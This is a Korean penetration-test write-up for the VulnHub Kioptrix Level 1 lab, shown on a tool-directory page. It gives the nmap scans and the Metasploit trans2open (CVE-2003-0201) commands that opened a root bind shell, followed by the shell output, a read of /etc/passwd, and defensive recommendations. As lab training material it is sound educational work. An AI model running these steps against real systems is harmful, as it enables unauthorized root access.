Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
pentest-writeups — Kioptrix Level 1 분석글 - CVE-2003-0201 Samba trans2open | Kitploit
도구/GitHubGitHub/americooo/pentest-writeups
Privilege EscalationReconnaissanceVulnerability AnalysisExploitationPost-ExploitationCTFPenetration TestingLearning & EducationLabs & Practice
GitHubamericooo/pentest-writeups

pentest-writeups

Kioptrix Level 1 분석글 - CVE-2003-0201 Samba trans2open

122개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

pentest-writeups

Kioptrix Level 1 분석 보고서 - CVE-2003-0201 Samba trans2open

Kioptrix Level 1 — 침투 테스트 분석 보고서

저자: Amirbek Raxmatullayev (@americo_444)
날짜: 2026-06-17
플랫폼: VulnHub
난이도: 초급
목표: root 권한 획득


1. 환경 설정

구성 요소세부 정보
호스트 OSUbuntu 26.04
하이퍼바이저QEMU/KVM
대상Kioptrix Level 1 (VMDK)
공격자 IP192.168.56.1
대상 IP192.168.56.101

참고: VirtualBox는 DKMS KVM 네임스페이스 충돌로 인해 커널 7.0.0-22-generic과 호환되지 않았습니다. QEMU/KVM으로 전환하고 변환 없이 VMDK를 직접 로드했습니다.

qemu-system-x86_64 \
  -m 512 \
  -drive file="Kioptix Level 1.vmdk",format=vmdk \
  -netdev bridge,id=net0,br=virbr0 \
  -device e1000,netdev=net0 \
  -display gtk

2. 정찰

2.1 호스트 탐색

nmap -sn 192.168.56.0/24

결과: 대상이 192.168.56.101에서 식별됨

2.2 전체 포트 및 서비스 스캔

nmap -sV -sC -p- 192.168.56.101

열린 포트:

포트서비스버전
22/tcpSSHOpenSSH 2.9p2
80/tcpHTTPApache 1.3.20
111/tcpRPCrpcbind 2
139/tcpSMBSamba 2.2.1a
443/tcpHTTPSmod_ssl/2.8.4
32768/tcpStatusRPC #100024

2.3 SMB 버전 열거

msfconsole -q -x "use auxiliary/scanner/smb/smb_version; \
  set RHOSTS 192.168.56.101; run; exit"

결과: Samba 2.2.1a — 취약한 버전이 확인됨.


3. 취약점 분석

CVE-2003-0201 — Samba trans2open 버퍼 오버플로우

설명:
Samba 2.2.x 버전은 trans2open 함수에 스택 기반 버퍼 오버플로우 취약점이 있습니다. 이를 통해 인증되지 않은 원격 공격자가 root 권한으로 임의 코드를 실행할 수 있습니다.

영향을 받는 버전: Samba 2.0.x — 2.2.8
CVSS 점수: 10.0 (Critical)
익스플로잇 모듈: exploit/linux/samba/trans2open


4. 익스플로잇

4.1 Metasploit 설정

msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD linux/x86/shell_bind_tcp
run

왜 reverse_tcp 대신 bind_tcp를 사용했는가?
reverse_tcp 페이로드는 Kioptrix VM이 NAT/브리지 설정을 통해 공격자에게 다시 연결할 수 없었기 때문에 실패했습니다. bind_tcp를 사용하면 공격자가 대상에 연결하므로 피해자 측에서 나가는 연결이 필요하지 않습니다.

4.2 익스플로잇 출력

[*] Started bind TCP handler against 192.168.56.101:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
...
[*] Command shell session 1 opened (192.168.56.1:36733 -> 192.168.56.101:4444)

셸 획득! ✅


5. 사후 익스플로잇

whoami
# root

id
# uid=0(root) gid=0(root) groups=99(nobody)

hostname
# kioptrix.level1

uname -a
# Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# john:x:500:500::/home/john:/bin/bash
# harold:x:501:501::/home/harold:/bin/bash

시스템 정보:

  • OS: Red Hat Linux, 커널 2.4.7 (2001년 빌드)
  • 발견된 로컬 사용자: root, john, harold

6. 공격 체인

[Attacker: 192.168.56.1]
        |
        | Step 1: nmap full port scan
        v
[Target: 192.168.56.101]
        |
        | Step 2: Samba 2.2.1a identified
        v
[Metasploit — trans2open exploit]
        |
        | Step 3: Stack buffer overflow triggered
        v
[Bind shell opened on port 4444]
        |
        | Step 4: whoami = root
        v
[TARGET PWNED]

7. 주요 시사점

배운 점:

  • VirtualBox가 실패했을 때 QEMU/KVM으로 실습 환경 구축하기
  • nmap -sV -sC로 서비스 핑거프린팅
  • Metasploit 보조 모듈을 사용한 SMB 열거
  • CVE-2003-0201 이해 — 스택 버퍼 오버플로우 메커니즘
  • bind_tcp와 reverse_tcp 페이로드의 차이점 및 각각을 사용해야 하는 경우

방어 권장 사항 (블루 팀):

  1. Samba를 3.x 이상 버전으로 업그레이드
  2. 방화벽으로 139/445 포트 제한 — 신뢰할 수 있는 내부 호스트만 허용
  3. 모든 OS 및 서비스 패치 적용
  4. 네트워크 세분화 구현 — SMB는 외부에 노출되어서는 안 됨
  5. SMB 버퍼 오버플로우 시도를 탐지하는 IDS/IPS 규칙 배포

8. 사용된 도구

도구목적
nmap포트 스캔, 서비스/버전 탐지
Metasploit FrameworkSMB 열거, 익스플로잇
QEMU/KVM실습 가상화
arp-scan호스트 탐색

9. 참고 자료

  • CVE-2003-0201 — NVD
  • Rapid7 — trans2open Module
  • VulnHub — Kioptrix Level 1

작성자: Amirbek Raxmatullayev | BEK Coders Security Research | 2026

도구 다운로드